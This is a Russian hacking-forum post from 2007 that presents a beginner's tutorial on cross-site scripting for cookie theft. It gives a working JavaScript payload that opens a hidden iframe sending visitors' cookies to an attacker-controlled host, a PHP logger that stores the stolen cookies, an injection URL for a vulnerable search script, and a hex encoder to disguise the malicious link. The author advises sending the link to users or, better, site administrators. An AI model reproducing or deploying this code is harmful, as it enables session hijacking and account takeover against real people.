Правила Форума редакция от 22.06.2020 |
|
|
|
|
|
Опции темы | Опции просмотра | Language |
19.07.2007, 13:31 | #1 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
XSS, - введение, статья для начинающих by Jenizix
Автор: Jenizix, WHB (Web-Hack Board)
Ну найти в интернете описание XSS-бага я думаю труда не составит... Перейдем сразу к использованию: -= 3-2-1 go! =- Сначала зарегистрируем ( или возьмем имеющийся ) домен с хостингом ( пофиг какого уровня =)))) ) с поддержкой PHP... допустим мы зарегили xss.host.ru... Создадим файл xss.js с таким содержимым: Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://xss.host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>'); Этот JavаScript будет открывать невидимый iframe на странице, в котором будет гризиться наш скрипт принимающий куки... + ему будет передаваться имя сайта откуда куки были стырены. Я выбрал тег <iframe> т.к. у некоторых отключен показ рисунков => тег <img> не прокатит... да и попапы могут резаться... Теперь создадим файл xss.php: Код:
<? $file = fopen("cookies","a"); fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n"); fclose($file); ?> Закинем оба файла в веб-директорию нашего сайта... ну вощем чтоб они были доступны как
и
-= Боевые действия =- Ну теперь найдем бажный сайт с XSS уязвимостью. Допустим уязвимость будет тут:
ок. уязвимость есть. пошлем скрипту find.php запрос типа Код:
find.php?find=<script src=http://xss.host.ru/xss.js></script>
и видим стырены куки! =))) -= Шифруемся =- НО! В открытую этот линк кидать не стоит... палевно... сделаем так, напишем php-скрипт для кодировки символов в hex и для разкодировки из hex: hex.php: Код:
<? $str = urldecode($_SERVER['QUERY_STRING']); for($i=0;$i<strlen($str);$i++) { $hex=dechex(ord($str[$i])); if($str[$i]=='&') echo "$str[$i]"; else echo "%$hex"; } ?> Код:
<? echo urldecode($_SERVER['QUERY_STRING']); ?> например нам нужно чтобы юзер прошелся по этой ссылке:
но как я уже говорил, в открытую ее ему кидать - палевно... заюзаем наш hex.php:
Получим вот что:
это hex представление текста: <script src=http://xss.host.ru/xss.js></script> Теперь наша ссылка будет выглядеть вот так:
Как видите, не очень и палиться =))) Теперь осталось скинуть этот линк какомунибудь юзеру ( а лучше админу ) сайта site.ru и ждать его куков ( если конечно они там юзаются )... Куки могут быть в hex-виде... тут нам придет на помощ unhex.php:
-= Подводим итоги =- Теперь у нас есть полноценные скрипты для проведения XSS-атаки. Еще можно наш xss.js прогнать через hex.php чтоб еще побольше обезопаситься )))
__________________
Sometimes the life chooses for us.. Если человек идиот он должен знать об этом. (c) me Последний раз редактировалось WeNZeeR; 31.07.2007 в 14:18.. |
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Эти 10 пользователя(ей) сказали cпасибо за это полезное сообщение: |
Реклама: | как использовать воск для брекетов | карамзин теплоход расписание 2024 | привод pds 05/230.dt (для засл. выт. канала) | эутома | Рекомендуем супермаркет КНС.ру - powerman online - более 50-ти тысяч наименований товаров со склада в Москве |
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Статья 12.15 ч.1 | DI__MON | Административное право | 9 | 14.10.2009 07:43 |
Русский рукопашный бой [Введение] | Meverik | Различные ссылки | 1 | 09.10.2005 15:36 |
|
|